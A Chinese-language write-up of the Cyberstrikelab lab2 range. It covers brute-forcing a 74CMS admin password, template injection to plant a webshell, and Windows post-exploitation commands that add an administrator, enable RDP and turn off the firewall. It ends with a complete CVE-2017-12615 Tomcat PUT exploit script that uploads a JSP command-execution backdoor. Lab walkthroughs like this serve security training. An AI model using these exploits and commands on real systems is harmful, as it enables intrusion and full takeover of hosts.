内网基础-Cyberstrikelab靶场lab2

admin

138359
文章

113
评论

2025年4月9日00:45:19评论10 views字数 3473阅读11分34秒阅读模式

鼎新安全

don't give up and don't give in !

内网基础-Cyberstrikelab靶场lab2

信息收集

内网基础-Cyberstrikelab靶场lab2

这里可以看到cms是骑士CMS！这个cms是存在漏洞的！我们使用fscan扫描一下！

内网基础-Cyberstrikelab靶场lab2

这里发现了192.168.10.10和192.168.10.20这两个IP！我们先从192.168.10.10开始打！这里扫描可以看到他的cms服务开启在808端口上！

内网基础-Cyberstrikelab靶场lab2 参考：

后台地址：

/index.php?m=admin&c=index&a=login

这里的账号密码可以爆破出来！直接在bp固定username位为admin，只爆破密码即可！

拿到账号密码：admin：admin123456

漏洞利用

内网基础-Cyberstrikelab靶场lab2

我们打后台模板代码注入漏洞！

内网基础-Cyberstrikelab靶场lab2

点击 "工具-风格模板-可用模板" 即可！

内网基础-Cyberstrikelab靶场lab2

这里修改tpl_dir参数！直接写入木马即可！

Get flag1

内网基础-Cyberstrikelab靶场lab2

蚁剑连接成功！

内网基础-Cyberstrikelab靶场lab2

到这里可以发现，192.168.10.10这台机器的权限很高！

内网基础-Cyberstrikelab靶场lab2

这里上传v生成的木马，我们上线vshell，vshell的木马是有一定免杀能力的！

内网基础-Cyberstrikelab靶场lab2

这里我们在tomcat目录下再次上传fscan扫描一下！

内网基础-Cyberstrikelab靶场lab2

扫描完成还是之前的结果！我们先添加用户！

内网基础-Cyberstrikelab靶场lab2

添加用户  net user admin 123@abc /add  net localgroup administrators admin /add  开启RDP  REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f  关闭防火墙  netsh advfirewall set allprofiles state off  防火墙放行3389  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow  关闭身份验证  reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

然后我们直接连接即可！

内网基础-Cyberstrikelab靶场lab2

flag在10机器的c盘下！

Get flag2

刚刚我们的fscan扫描到了192.168.10.20是域控服务器，名称：cyberstrikelab.com而且它的服务是开启在8080端口上的！192.168.10.20是台双网卡机器！内网IP我们暂时没用获取！8080端口的web服务是tomcat起的，而且存在Tomcat Put文件上传漏洞！

内网基础-Cyberstrikelab靶场lab2

我们使用网上找的exp！

python#CVE-2017-12615 EXP__author__ = '纸机'import requestsimport optparseimport timeparse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')parse.add_option('-u','--url',dest='URL',help='target url')parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')options,args = parse.parse_args()#验证参数是否完整if not options.URL or not options.PORT:print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]n')exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')url = options.URL+':'+options.PORTfilename = '/backdoor.jsp'payload = filename+'?pwd=023&i='headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}#木马data = '''<%    if("023".equals(request.getParameter("pwd"))){        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = new byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){            out.println(new String(b));        }        out.print("</pre>");    }%>'''#上传木马文件def upload(url):print('[] 目标地址:'+url)  try:    respond = requests.put(url+filename+'/',headers=headers,data = data)#print(respond.status_code)if respond.status_code == 201 or respond.status_code == 204:#print('[] 目标地址:'+url)print('[+] 木马上传成功')  except Exception as e:print('[-] 上传失败')return 0#命令执行def attack(url,cmd):  try:    respond = requests.get(url+payload+cmd)if respond.status_code == 200:print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())  except Exception as e:print('[-] 命令执行错误')if upload(url) == 0:exit()time.sleep(0.5)print('输入执行命令(quit退出):')while(1):  cmd = input('>>>')if(cmd == 'quit'):break  attack(url,cmd)